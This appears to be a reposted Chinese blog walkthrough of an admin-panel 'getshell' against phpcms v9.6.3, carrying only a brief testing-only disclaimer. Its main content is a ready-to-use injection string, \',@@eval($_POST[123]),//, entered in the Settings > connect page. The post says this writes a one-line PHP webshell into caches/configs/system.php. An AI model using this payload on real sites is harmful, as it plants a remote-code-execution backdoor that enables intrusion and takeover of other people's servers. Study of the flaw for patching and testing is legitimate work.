码迷,mamicode.com
首页 > Web开发 > 详细

phpcms_v9.6.3后台getshell

时间:2020-01-03 22:59:31      阅读:402      评论:0      收藏:0      [点我收藏+]

标签:get   一句话木马   dex   gets   后台   connect   block   com   pos   

内容仅供测试使用,请遵守网络安全法

安装完后登陆后台
http://127.0.0.1/phpcms/index.php?m=admin&c=index&a=login
技术图片

后台 - 设置 - connect
技术图片

在此处插入 \\‘,@@eval($_POST[123]),//,闭合掉 \phpcms\caches\configs\system.php 这里的 key 参数会将一句话木马写入 system.php 文件。
技术图片

访问:
技术图片

phpcms_v9.6.3后台getshell

标签:get   一句话木马   dex   gets   后台   connect   block   com   pos   

原文地址:https://www.cnblogs.com/sstfy/p/12147032.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!